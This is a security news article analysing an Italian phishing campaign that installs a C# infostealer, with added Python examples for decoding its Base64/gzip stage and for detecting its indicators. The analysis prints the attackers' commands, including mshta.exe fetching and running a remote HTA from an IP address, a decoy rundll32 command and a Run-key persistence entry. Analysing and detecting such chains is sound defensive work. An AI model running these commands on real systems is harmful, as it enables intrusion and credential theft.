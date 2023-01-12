A new malware campaign targeting Italy has come under scrutiny: phishing emails are used to distribute an infostealer (literally an “information thief”) onto compromised Windows systems.

How this malware attack works and what damage it can cause

“Infostealer malware steals sensitive information such as system information, digital wallet [i.e. cryptocurrency wallet] and browser histories, cookies, and encrypted wallet credentials from victim devices,” security researcher Karthickkumar Kathiresan of cybersecurity firm Uptycs stated in a report.

The details of the campaign were first disclosed last month by SI.net, a Milan-based IT services company.

The multi-stage infection sequence begins with an invoice-themed phishing email (carrying a fake invoice, naturally) containing a link that, when clicked, downloads a password-protected ZIP archive. The archive holds two files: a shortcut file (.LNK) and a batch file (.BAT).

Regardless of which file is launched, the attack proceeds the same way: opening the shortcut (.LNK) file fetches the same batch script (.BAT), which installs the information-stealer payload from a GitHub repository. This is done through a legitimate PowerShell binary that is itself fetched from GitHub, so no custom tooling has to be dropped for the first stage.

Once installed, the C#-based malware collects system metadata and data from web browsers (cookies, bookmarks, saved credit cards, download history and stored credentials), as well as from cryptocurrency wallets where present (the Brave browser, for example, ships with a built-in one). Everything is then exfiltrated to the attacker, wherever in the world they may be.

Technical analysis of the malware attack

When the user opens the .lnk file from the extracted archive, the shortcut launches powershell.exe (the successor of the classic Windows command prompt), which in turn invokes mshta.exe, the Microsoft HTML Application host, a signed Windows executable, to run an HTA script fetched directly from a URL.

The command that PowerShell writes out and executes is:

“C:\Windows\System32\mshta.exe” http://116.203.19.97/1/lib32.hta

The VBScript embedded in the HTA page that MSHTA loads decrypts its contents in memory and goes on to run PowerShell commands that download two files into the root of %ProgramData%.

These two files are:

An image file (image.png), a decoy that is opened full-screen by rundll32.exe through the Windows Photo Viewer DLL with the command below:

“C:\Windows\System32\rundll32.exe” “C:\Program Files\Windows Photo Viewer\PhotoViewer.dll”, ImageView_Fullscreen C:\ProgramData\image.png

The second, and no less important, a .BAT file: Fattura_IT9032003.bat (“fattura” is Italian for invoice).

A copy of start.exe is then dropped into the root of the System32 folder, renamed Fattura_IT9032003.bat.exe, and given the hidden file attribute.

Fattura_IT9032003.bat.exe is then launched with a command line that carries a Base64-encoded payload. At run time it decodes the data, gzip-decompresses it and loads the resulting code in memory.

This code, in turn, decompresses further data on demand as the attack progresses.
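The Base64-then-gzip packing described in the two paragraphs above is something an analyst has to unwind by hand when triaging the loader's command line. The helper below is an added example (not code from the article, from Uptycs or from SI.net) that finds Base64 blobs in a command line, checks for the gzip magic and inflates them. The real Fattura_IT9032003.bat.exe command line is not published on the page, so a harmless placeholder stands in for the second stage, and the sample command line is constructed here.

```python
"""Triage helper for a Base64-encoded, gzip-compressed loader stage.

Added example, not code from the original article, from Uptycs or from
SI.net. The command line below is constructed for the example: the real
Fattura_IT9032003.bat.exe command line was not published, so a harmless
placeholder stands in for the second-stage code.
"""
import base64
import gzip
import re
import zlib
from typing import Optional

GZIP_MAGIC = b"\x1f\x8b"
# Runs of 40+ Base64 characters, optionally padded, anywhere in a command line.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def encode_stage(stage: bytes) -> str:
    """Pack a stage the way the article describes: gzip first, then Base64."""
    return base64.b64encode(gzip.compress(stage)).decode("ascii")


def find_b64_blobs(cmdline: str) -> list:
    """Return candidate Base64 blobs found in a command line."""
    return B64_RE.findall(cmdline)


def decode_stage(blob: str) -> Optional[bytes]:
    """Base64-decode and gunzip one blob.

    Returns None when the blob is not valid Base64 or the decoded bytes are
    not a gzip stream, so plain Base64 arguments are not misreported.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if not raw.startswith(GZIP_MAGIC):
        return None
    try:
        return gzip.decompress(raw)
    except (OSError, EOFError, zlib.error):  # truncated or corrupt stream
        return None


def triage(cmdline: str) -> list:
    """Decode every Base64 blob in a command line and report what it held."""
    report = []
    for blob in find_b64_blobs(cmdline):
        stage = decode_stage(blob)
        report.append({
            "blob_len": len(blob),
            "gzip": stage is not None,
            "stage": stage.decode("utf-8", "replace") if stage else None,
        })
    return report


# Constructed sample: a harmless placeholder for the real second stage.
PLACEHOLDER_STAGE = (
    b"# placeholder for the real second-stage PowerShell code\n"
    b"Write-Host 'stage2'\n"
)
SAMPLE_CMDLINE = (
    "C:\\Windows\\System32\\Fattura_IT9032003.bat.exe "
    + encode_stage(PLACEHOLDER_STAGE)
)

if __name__ == "__main__":
    for entry in triage(SAMPLE_CMDLINE):
        print(entry)
```

The gzip magic check is what keeps the helper honest: a command line full of ordinary Base64 (an `-EncodedCommand` argument, a certificate, an auth token) decodes cleanly but is reported as not gzip rather than as a loader stage. Real loaders often add further layers (UTF-16LE text, a second Base64 pass, XOR), which is why the decoded stage is returned as bytes for the analyst to inspect rather than executed or assumed to be text.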

Finally, start.exe downloads the binary payloads from GitHub and drops them under the user's roaming profile folder (%AppData%, i.e. C:\Users\<user>\AppData\Roaming) as wininfo64\lib32.exe.

lib32.exe is a 64-bit executable compiled in C#. It carries compressed data in its resource section, which is decompressed at run time.

The decompressed data, at virtual address 0x78400, is a further DLL: Ejefqnxog.dll.

Alongside this, the malware creates the following autostart entry in the user's registry hive (HKU\<SID>, the same hive seen as HKCU by the logged-on user):

HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EAC_Update: “C:\Users\<user>\AppData\Roaming\wininfo64\lib32.exe”

Ejefqnxog.dll is also a 64-bit DLL compiled in C#. At run time it decrypts its encrypted content and then proceeds to read the unfortunate user's data.

At this point the infostealer collects the sensitive information it is after from the victim's computer: personal data and, as listed above, browser and wallet data gathered during the attack.
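Every stage of the chain described above leaves a distinctive trace in process-creation and registry telemetry, and those traces are what a detection engineer would encode. The script below is an added example (not code from the article, from Uptycs or from SI.net) that runs a handful of indicator checks over constructed Sysmon-like event records: the field names, the sample SID and the user name are assumptions for the example, while the indicators themselves (mshta.exe fetching an .hta over HTTP from powershell.exe, rundll32.exe showing a decoy image from %ProgramData% via PhotoViewer.dll, a *.bat.exe in System32, the EAC_Update Run value and the wininfo64 folder) are the ones the article reports. Two benign look-alike events are included to show the checks do not fire on ordinary use of the same Windows binaries.

```python
"""Detection logic for the infection chain described in the article.

Added example; not code from the article, from Uptycs or from SI.net.
Event records are constructed in a Sysmon-like shape: process creation
(image, cmdline, parent_image) and registry value set (target, data).
Field names, the SID and the user name are assumptions for the example.
"""
import re

URL_RE = re.compile(r"https?://", re.IGNORECASE)
BAT_EXE_IN_SYSTEM32 = re.compile(r"\\windows\\system32\\[^\\]+\.bat\.exe$")


def check_event(ev: dict) -> list:
    """Return the names of the indicators a single event matches."""
    hits = []
    if ev.get("type") == "process":
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "")
        cmd_l = cmd.lower()
        parent = ev.get("parent_image", "").lower()

        # Stage 1: MSHTA pulling an HTA straight from a URL.
        if image.endswith("\\mshta.exe") and URL_RE.search(cmd):
            hits.append("mshta.exe executing a remote HTA")
            if parent.endswith("\\powershell.exe"):
                hits.append("mshta.exe spawned by powershell.exe (LNK -> PowerShell -> MSHTA)")

        # Decoy: rundll32 + PhotoViewer.dll on an image dropped in %ProgramData%.
        # Weak on its own (users open pictures this way too), hence the path check.
        if (image.endswith("\\rundll32.exe") and "photoviewer.dll" in cmd_l
                and "imageview_fullscreen" in cmd_l and "\\programdata\\" in cmd_l):
            hits.append("rundll32.exe showing a decoy image from %ProgramData%")

        # Stage 2: double-extension loader dropped into System32.
        if BAT_EXE_IN_SYSTEM32.search(image):
            hits.append("*.bat.exe executable in System32")

        # Stage 3: stealer running from the wininfo64 staging folder.
        if "\\appdata\\roaming\\wininfo64\\" in image:
            hits.append("execution from %AppData%\\wininfo64")

    elif ev.get("type") == "registry":
        target = ev.get("target", "").lower()
        data = ev.get("data", "").lower()
        if "\\currentversion\\run\\" in target and (
                target.endswith("\\eac_update") or "\\wininfo64\\" in data):
            hits.append("Run-key persistence (EAC_Update / wininfo64)")
    return hits


def scan(events: list) -> list:
    """Run check_event over a batch; return (event index, indicator) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in check_event(ev)]


# Constructed telemetry: five events from the chain, then two benign look-alikes.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
PHOTOVIEWER = '"C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll", ImageView_Fullscreen '
SAMPLE_EVENTS = [
    {"type": "process", "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": PS,
     "cmdline": '"C:\\Windows\\System32\\mshta.exe" http://116.203.19.97/1/lib32.hta'},
    {"type": "process", "image": "C:\\Windows\\System32\\rundll32.exe", "parent_image": PS,
     "cmdline": '"C:\\Windows\\System32\\rundll32.exe" ' + PHOTOVIEWER + "C:\\ProgramData\\image.png"},
    {"type": "process", "image": "C:\\Windows\\System32\\Fattura_IT9032003.bat.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",  # parent assumed for the example
     "cmdline": "C:\\Windows\\System32\\Fattura_IT9032003.bat.exe <base64 payload>"},
    {"type": "registry",
     "target": "HKU\\S-1-5-21-0-0-0-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\EAC_Update",
     "data": "C:\\Users\\user\\AppData\\Roaming\\wininfo64\\lib32.exe"},
    {"type": "process", "image": "C:\\Users\\user\\AppData\\Roaming\\wininfo64\\lib32.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": "C:\\Users\\user\\AppData\\Roaming\\wininfo64\\lib32.exe"},
    # Benign: a user opening a picture with Photo Viewer from their own profile.
    {"type": "process", "image": "C:\\Windows\\System32\\rundll32.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": '"C:\\Windows\\System32\\rundll32.exe" ' + PHOTOVIEWER + "C:\\Users\\user\\Pictures\\holiday.png"},
    # Benign: mshta running a local HTA, e.g. an installer UI.
    {"type": "process", "image": "C:\\Windows\\System32\\mshta.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": '"C:\\Windows\\System32\\mshta.exe" C:\\Users\\user\\Downloads\\setup.hta'},
]

if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {hit}")
```

The checks that key on paths and names (Fattura_IT9032003.bat.exe, EAC_Update, wininfo64) will be broken by the next build of the stealer; the ones that key on behaviour (mshta.exe given an http URL, a *.bat.exe under System32, a Run value pointing into %AppData%) survive renaming, so they are the ones worth keeping as standing rules while the name-based ones serve as indicators for this specific campaign.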

Prevention is better than cure

Of course, a computer does not wake up one morning and decide to let malware in. The .LNK files must first be downloaded and then opened by the user, or nothing starts.

Speaking of a “malware attack” is in fact something of a misnomer, because this kind of damage too depends on the user's habits.

Unfortunately our country has been hit because, besides the widespread carelessness and misinformation about computing, many people use very dangerous software such as Windows KMS activators, which are notoriously built from malicious code.

Windows licences are very cheap these days on Amazon and from third-party resellers. If, hypothetically, you bought one in 2016 for Windows 7, moved to Windows 10 (Microsoft allows it) carrying the licence over, and are lucky enough to own a PC compatible with Windows 11, is it really worth risking your personal data to avoid spending €20 on a licence?

Unfortunately the “vice” of not paying, in the belief that one is outsmarting the system, costs far more than the cash would: many of the cracks circulating online today are the antithesis of computer security, and there is little one can do about that.

Unfortunately the average Windows user makes several mistakes that at best slow down the operating system and at worst require a reinstall.